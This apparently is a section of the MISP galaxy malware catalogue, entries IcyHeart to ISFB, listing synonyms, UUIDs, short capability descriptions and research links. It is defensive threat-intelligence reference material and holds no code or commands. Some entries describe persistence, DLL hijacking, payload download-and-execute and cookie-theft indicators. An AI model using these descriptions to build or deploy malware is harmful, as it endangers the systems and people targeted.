- https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html - webarchive
- https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IcyHeart
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IcyHeart.
Known Synonyms |
---|
Troxen |
Internal MISP references
UUID bcc8b6ea-9295-4a22-a70d-422b1fd9814e
which can be used as unique global reference for IcyHeart
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IDKEY
Internal MISP references
UUID 3afecded-3461-45f9-8159-e8328e56a916
which can be used as unique global reference for IDKEY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IISniff
Internal MISP references
UUID 3b746f77-214b-44f9-9ef2-0ae6b52561d6
which can be used as unique global reference for IISniff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff - webarchive
- https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/ - webarchive
- https://www.welivesecurity.com/2021/08/06/anatomy-native-iis-malware/ - webarchive
- https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware.pdf - webarchive
- https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IISpy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IISpy.
Known Synonyms |
---|
BadIIS |
Internal MISP references
UUID 74afd7ae-8349-4186-9c85-82a45a2486c9
which can be used as unique global reference for IISpy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IMAPLoader
Internal MISP references
UUID ffcd59c0-56d0-4693-9804-e46e5dcd21ce
which can be used as unique global reference for IMAPLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Imecab
Internal MISP references
UUID 0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7
which can be used as unique global reference for Imecab
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Imminent Monitor RAT
MITRE describes Imminent Monitor as a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.
Internal MISP references
UUID 53021414-97ad-4102-9cff-7a0e1997f867
which can be used as unique global reference for Imminent Monitor RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat - webarchive
- https://www.atomicmatryoshka.com/post/infographic-apts-in-south-america - webarchive
- https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html - webarchive
- https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-trinity - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.politie.nl/nieuws/2021/mei/19/04-aanhouding-in-onderzoek-naar-cybercrime.html - webarchive
- https://www.tripwire.com/state-of-security/featured/man-jailed-using-webcam-rat-women-bedrooms/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt - webarchive
- https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/ - webarchive
- https://ti.360.net/blog/articles/apt-c-36-continuous-attacks-targeting-colombian-government-institutions-and-corporations-en/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Immortal Stealer
Zscaler describes Immortal Stealer as Windows malware written in .NET and designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions.
Internal MISP references
UUID 5f688e85-5f33-4ae6-880a-fc2e5146dd28
which can be used as unique global reference for Immortal Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ImprudentCook
ImprudentCook is an HTTP(S) downloader.
It was delivered in the Operation DreamJob type of activity targeting aerospace and defense companies in South Africa (in Q2 2022) and in Central Europe (in H1 2023), and against an unknown sector in South Korea back in Q2 2021.
It uses the AES cipher implemented through Windows Cryptographic Providers for decryption of its binary configuration, and also for encryption and decryption of the client-server communication.
It is hidden in an alternate data stream (:dat or :zone) of its dropper, together with its configuration (:rsrc) and an AES-128 CBC key with an initialization vector for its decryption (:kgb or :data).
It contains two characteristic arrays of strings that represent cookie names for web services, including Bing, Daum and GitHub:
- iKc;uid;OAX;DMP_UID;PCID;_gid;_gat;csrftoken;NID;1P_JAR;JSESSIONID;WLS;SNID; utma;BID;SRCHD;GsCK_AC;spintop;eader;XSRF-TOKEN;gat_gtag_UA;webid enabled;EDGE_V;dtck_channel;dtmulti;UUID;XUID;ZIA;IUID;SSID;_gh_sess;_octo
- channel;post_titles;xfw_exp;wiht_clkey;SGPCOUPLE;NRTK;fbp;uaid;SRCHUSR;GUC;HPVN;dtck_ blog;dtck_media;MUIDB;SRCHHPGUSR;SiteMain
It contains a string, "5.40" or "5.60", that looks like version information.
Internal MISP references
UUID 76269425-73c2-4ce5-aab5-da744ad6bc1f
which can be used as unique global reference for ImprudentCook
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
INCONTROLLER
Internal MISP references
UUID 3ed3e880-1b93-4ca2-9e9d-0e429c4c895f
which can be used as unique global reference for INCONTROLLER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Incubator
Keylogger written in Visual Basic dating back to at least 2012.
Internal MISP references
UUID b03201bd-8307-4c66-915e-d8f623084abe
which can be used as unique global reference for Incubator
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.incubator - webarchive
- https://www.sentinelone.com/wp-content/uploads/2022/02/Modified-Elephant-APT-and-a-Decade-of-Fabricating-Evidence-SentinelLabs.pdf - webarchive
- https://www.sentinelone.com/labs/modifiedelephant-apt-and-a-decade-of-fabricating-evidence/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IndigoDrop
Internal MISP references
UUID e98b19ce-82c3-472d-98d1-d81341af4267
which can be used as unique global reference for IndigoDrop
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Industrial Spy
A ransomware that emerged in April 2022.
Internal MISP references
UUID 69fc6a53-3ef1-47e8-bcdb-e300d2a972a7
which can be used as unique global reference for Industrial Spy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Industroyer
Industroyer is a malware framework considered to have been used in the cyberattack on Ukraine's power grid on December 17, 2016. The attack cut power to a fifth of Kiev, the capital, for one hour. It is the first known malware specifically designed to attack electrical grids.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Industroyer.
Known Synonyms |
---|
Crash |
CrashOverride |
Internal MISP references
UUID 610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6
which can be used as unique global reference for Industroyer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer - webarchive
- https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors - webarchive
- https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/ - webarchive
- https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/ - webarchive
- https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf - webarchive
- https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf - webarchive
- https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://www.virusbulletin.com/conference/vb2017/abstracts/last-minute-paper-industroyer-biggest-threat-industrial-control-systems-stuxnet/ - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games - webarchive
- https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/ - webarchive
- https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics - webarchive
- https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ - webarchive
- https://cert.gov.ua/article/39518 - webarchive
- https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf - webarchive
- https://sos-vo.org/sites/sos-vo.org/files/2024-04/HoTSoS2024_TaleOfTwoIndustroyers.pdf - webarchive
- https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/ - webarchive
- https://dragos.com/blog/crashoverride/CrashOverride-01.pdf - webarchive
- https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-viking - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://en.wikipedia.org/wiki/Industroyer - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
INDUSTROYER2
Internal MISP references
UUID fa54359c-4a3f-45ea-a941-f2105aa27ef4
which can be used as unique global reference for INDUSTROYER2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.industroyer2 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://twitter.com/silascutler/status/1513870210398363651 - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://pylos.co/2022/04/23/industroyer2-in-perspective/ - webarchive
- https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/ - webarchive
- https://www.splunk.com/en_us/blog/security/threat-update-industroyer2.html - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://www.nozominetworks.com/blog/industroyer2-nozomi-networks-labs-analyzes-the-iec-104-payload/ - webarchive
- https://www.nozominetworks.com/downloads/US/Nozomi-Networks-WP-Industroyer2.pdf - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://www.mandiant.com/resources/industroyer-v2-old-malware-new-tricks - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.netresec.com/?page=Blog&month=2022-04&post=Industroyer2-IEC-104-Analysis - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/ - webarchive
- https://blog.scadafence.com/industroyer2-attack - webarchive
- https://cert.gov.ua/article/39518 - webarchive
- https://sos-vo.org/sites/sos-vo.org/files/2024-04/HoTSoS2024_TaleOfTwoIndustroyers.pdf - webarchive
- https://www.ntop.org/cybersecurity/how-ntopng-monitors-iec-60870-5-104-traffic/ - webarchive
- https://blogs.blackberry.com/en/2022/05/threat-thursday-malware-rebooted-how-industroyer2-takes-aim-at-ukraine-infrastructure - webarchive
- https://www.mandiant.com/resources/blog/gru-disruptive-playbook - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Inferno
Internal MISP references
UUID 7638ac2e-0cdc-4101-8e3d-54b7b74a9c92
which can be used as unique global reference for Inferno
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
InfinityLock
InfinityLock ransomware is a type of malicious software that encrypts a victim's files and demands a ransom payment in order to decrypt them. It is spread through phishing emails and malicious websites. Once a computer is infected with InfinityLock, it encrypts all important files, such as documents, photos, and videos. It then displays a message that demands the victim pay a ransom of $1,000 in Bitcoin in order to decrypt the files. If the victim does not pay the ransom, the files will be lost permanently.
Internal MISP references
UUID 37fca614-e29a-4029-8afd-d3de61aa3ba0
which can be used as unique global reference for InfinityLock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
InfoDot
Ransomware.
Internal MISP references
UUID e0ce5055-45cd-46d2-971f-bb3904ec43a1
which can be used as unique global reference for InfoDot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Infy
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Infy.
Known Synonyms |
---|
Foudre |
Internal MISP references
UUID 53616ce4-9b8e-45a0-b380-9e778cd95ae2
which can be used as unique global reference for Infy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.infy - webarchive
- https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/ - webarchive
- https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf - webarchive
- https://research.checkpoint.com/2021/after-lightning-comes-thunder/ - webarchive
- https://cloud.tencent.com/developer/article/1738806 - webarchive
- http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/ - webarchive
- https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv - webarchive
- https://www.intezer.com/prince-of-persia-the-sands-of-foudre/ - webarchive
- http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Inlock
Internal MISP references
UUID 3071e2d4-c692-4054-a7bf-db9af6fe3b63
which can be used as unique global reference for Inlock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
InnaputRAT
InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018.
Internal MISP references
UUID dd486e92-54fe-4306-9aab-05863cb6c6e1
which can be used as unique global reference for InnaputRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
win.innfirat
InnfiRAT is coded in .NET and targets personal data on infected devices, with its top priority appearing to be Bitcoin and Litecoin wallet data.
InnfiRAT also includes a backdoor that allows attackers to control the infected host remotely. Capabilities include logging keystrokes, taking pictures with the webcam, accessing confidential information, formatting drives, and more.
It attempts to steal browser cookies in order to obtain usernames and passwords, and monitors the user's activities with screenshot functionality.
Internal MISP references
UUID b6aec7a7-7ebc-4aad-bcdf-1c3cb7044e3c
which can be used as unique global reference for win.innfirat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Interception (Windows)
ESET observed attacks against aerospace and military companies in Europe and the Middle East between September and December 2019 that featured this family. They found a number of hints pointing towards Lazarus as the potential origin.
Internal MISP references
UUID fa022849-248c-4620-86b4-2a36c704b288
which can be used as unique global reference for Interception (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Invicta Stealer
According to Cyble, the Invicta Stealer can collect system information, system hardware details, wallet data, and browser data, and extract information from applications such as Steam and Discord.
Internal MISP references
UUID 00a078bf-90db-4275-b7bd-0da757dd2284
which can be used as unique global reference for Invicta Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
InvisiMole
InvisiMole had a modular architecture, starting with a wrapper DLL and performing its activities using two other modules embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors that turned the affected computer into a video camera, letting the attackers spy on the victim. The malicious actors behind this malware were active since at least 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as the legitimate mpr.dll library and was placed in the same folder as explorer.exe, which caused it to be loaded into the Windows Explorer process during Windows startup instead of the legitimate library. The malware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.
The smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.
The second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces.
Internal MISP references
UUID 22755fda-497e-4ef0-823e-5cb6d8701420
which can be used as unique global reference for InvisiMole
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://cocomelonc.github.io/malware/2022/11/27/malware-tricks-24.html - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/ - webarchive
- https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/ - webarchive
- https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IPStorm (Windows)
Internal MISP references
UUID c32661f5-8281-424e-9726-c5beb1ab2c5e
which can be used as unique global reference for IPStorm (Windows)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ironcat
Internal MISP references
UUID c6fc8419-afb1-4e99-a6cf-4288ead2381b
which can be used as unique global reference for Ironcat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IRONHALO
IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.
The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.
Internal MISP references
UUID 44599616-3849-4960-9379-05307287ff80
which can be used as unique global reference for IRONHALO
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo - webarchive
- https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html - webarchive
- https://www.symantec.com/security-center/writeup/2015-122210-5128-99 - webarchive
- https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko - webarchive
- https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IronNetInjector
According to Mitre, IronNetInjector is a Turla toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including ComRAT.
Internal MISP references
UUID 5ec639ab-f6c1-4cbb-87b1-d59344878e98
which can be used as unique global reference for IronNetInjector
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IronWind
Internal MISP references
UUID 91c94b56-68c6-4249-a718-e0dc00de8fce
which can be used as unique global reference for IronWind
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
IsaacWiper
According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim’s machine.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular IsaacWiper.
Known Synonyms |
---|
LASAINRAW |
Internal MISP references
UUID 6fb2d1bb-f8a4-4f73-9ea7-a4a9aae4f609
which can be used as unique global reference for IsaacWiper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper - webarchive
- https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/ - webarchive
- https://www.brighttalk.com/webcast/15591/534324 - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/ - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/ - webarchive
- https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine - webarchive
- https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/ - webarchive
- https://twitter.com/ESETresearch/status/1521910890072842240 - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://experience.mandiant.com/trending-evil-2/p/1 - webarchive
- https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ISFB
- 2006: Gozi v1.0, Gozi CRM, CRM, Papras
- 2010: Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)
In September 2010, the source code of a particular Gozi CRM DLL version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merged with Pony and became Vawtrak/Neverquest.
The other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.
There is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.
ISFB was often protected by Rovnix. This led to a further complication in the naming scheme: many companies started to call ISFB "Rovnix". Because signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and Rerdom) sometimes got wrongly labelled as well.
In April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.
See win.gozi for additional historical information.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ISFB.
Known Synonyms |
---|
Gozi ISFB |
IAP |
Pandemyia |
Internal MISP references
UUID a171321e-4968-4ac0-8497-3250c1f0d77d
which can be used as unique global reference for ISFB
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb - webarchive
- https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/ - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
- https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245 - webarchive
- https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html - webarchive
- https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/ - webarchive
- https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features - webarchive
- https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/ - webarchive
- https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/ - webarchive
- https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html - webarchive
- https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/ - webarchive
- https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf - webarchive
- https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle - webarchive
- https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0 - webarchive
- https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them - webarchive
- http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html - webarchive
- https://twitter.com/JAMESWT_MHT/status/1712783250446328114?t=iLKXzsZuS1TTa0i9sZFkQA&s=19 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware - webarchive
- https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/ - webarchive
- https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf - webarchive
- https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/ - webarchive
- https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/ - webarchive
- https://www.youtube.com/watch?v=jlc7Ahp8Iqg - webarchive
- https://redcanary.com/resources/webinars/deep-dive-process-injection/ - webarchive
- https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/ - webarchive
- https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
